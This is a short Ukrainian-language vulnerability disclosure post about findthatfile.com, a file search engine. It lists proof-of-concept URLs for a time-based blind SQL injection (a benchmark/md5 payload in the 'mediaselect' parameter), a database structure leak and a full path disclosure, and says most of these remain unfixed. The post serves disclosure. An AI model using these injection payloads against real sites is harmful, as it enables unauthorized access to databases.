Уразливості на www.findthatfile.com
19:25 04.03.201024.08.2009
У січні, 03.01.2009, я знайшов SQL Injection, SQL DB Structure Extraction та Full path disclosure уразливості на проекті http://www.findthatfile.com (пошукова система). Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
04.03.2010
SQL Injection:
http://www.findthatfile.com/?q=test&mediaselect='%20and%20benchmark(10000,md5(now()))%20and%201='1
SQL DB Structure Extraction:
http://www.findthatfile.com/?q=test&mediaselect=’
Full path disclosure:
http://www.findthatfile.com/?q=test&mediaselect=’%20a()
Виправлена лише Full path disclosure уразливість. Всі інші уразливості досі не виправлені. В SQL Injection виправлений лише вектор атаки з benchmark, але можливі інші атаки на select запит, а також атаки на запити insert та update.